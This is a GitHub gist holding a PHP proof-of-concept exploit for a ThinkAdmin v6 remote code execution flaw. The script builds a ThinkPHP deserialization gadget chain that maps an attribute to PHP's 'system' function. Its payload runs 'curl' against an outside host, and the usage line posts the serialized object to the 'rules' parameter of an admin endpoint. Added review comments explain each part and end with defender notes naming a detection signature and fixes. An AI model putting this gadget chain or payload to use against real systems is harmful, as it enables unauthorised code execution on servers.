
@kaiili
Created February 6, 2020 10:07
POC for ThinkAdmin v6 RCE
<?php
/*
*
* Date: 2020-02-06
* Exploit Author: k4ii
* Daemon Link: https://v6.thinkadmin.top
* Version: v6
* Tested on: linux
* Usage:
* curl "https://v6.thinkadmin.top/admin/api.update/tree" -d "rules=`php poc.php`"
*/
namespace think\model\concern;
// Empty stand-in declared in the think\model\concern namespace so that the
// Model class further down can `use` a trait with this name. It contributes
// no properties or methods to the serialized object.
// NOTE(review): presumably mirrors the name of a real framework trait — confirm
// against the installed ThinkPHP source.
trait Conversion
{
}
// Stand-in trait that declares the two properties carrying the payload and a
// helper that fills one of them. Nothing in this file invokes the command
// string; the script only serializes it.
// NOTE(review): the risk sits on the receiving side. Presumably the real
// framework's attribute handling calls the callable named in $withAttr with the
// matching $data value once the object has been unserialized — confirm against
// the installed ThinkPHP version when assessing exposure.
trait Attribute
{
// Attribute values keyed by name; left unset here and populated by get().
private $data;
// Maps the attribute name "k4ii" to the string "system", which is also the
// name of a PHP function.
private $withAttr = ["k4ii" => "system"];
// Stores the value for the "k4ii" key in $data. Called from
// Model::__construct() in this file.
public function get()
{
$this->data = ["k4ii" => "curl http://10.1.1.1:9876/hacked"]; // command string paired with "system" above; only serialized here, never run by this script (10.1.1.1 is a private-range address)
}
}
namespace think;
// Stub declared as think\Model so that serialize() emits property names and
// visibilities under that class name. It pulls in the two traits above and
// declares a fixed set of properties; it has no behaviour beyond its constructor.
// Declaration order and visibility are part of the serialized output, so
// reordering or re-scoping these properties changes the emitted bytes.
// NOTE(review): presumably these flags are chosen to steer the real Model's
// save/teardown logic after unserialize() — that code is not shown here.
abstract class Model
{
use model\concern\Attribute;
use model\concern\Conversion;
// Declared false, then switched to true in the constructor below.
private $lazySave = false;
protected $withEvent = false;
private $exists = true;
private $force = true;
protected $field = [];
protected $schema = [];
protected $connection = 'mysql';
// Assigned by the Pivot subclass constructor.
protected $name;
protected $suffix = '';
// Populates $data through the trait's get(), then sets the properties.
// Apart from $lazySave (false -> true), every assignment repeats the
// declared default.
function __construct()
{
$this->get();
$this->lazySave = true;
$this->withEvent = false;
$this->exists = true;
$this->force = true;
$this->field = [];
$this->schema = [];
$this->connection = 'mysql';
}
}
namespace think\model;
use think\Model;
// Concrete subclass, needed because Model is abstract and cannot be
// instantiated directly. Serialized objects carry the class name
// think\model\Pivot.
class Pivot extends Model
{
// Runs the parent constructor, then stores $obj in the inherited $name
// property. $obj defaults to an empty string; the script below also passes
// another Pivot instance.
// NOTE(review): presumably the real framework treats $name as a string, so
// an object stored there would be converted to a string on the target —
// confirm against the framework source.
function __construct($obj = '')
{
parent::__construct();
$this->name = $obj;
}
}
// Inner object: $name is the default empty string.
$a = new Pivot();
// Outer object: $name holds the inner object.
$b = new Pivot($a);
// Prints the URL-encoded serialized outer object. Per the usage line in the
// header comment, the output is sent as the `rules` POST field.
// NOTE(review): presumably the endpoint passes `rules` to unserialize(); that
// server-side code is not shown here.
// Defender notes: a request parameter whose value starts with a serialized
// object marker (`O:`, URL-encoded as `O%3A`) and names a think\ class is a
// practical detection signal for this class of request. The durable fix is to
// stop passing request data to unserialize(): use json_decode(), or call
// unserialize() with ['allowed_classes' => false], and upgrade to a release
// that no longer deserializes this parameter.
echo(urlencode(serialize($b)));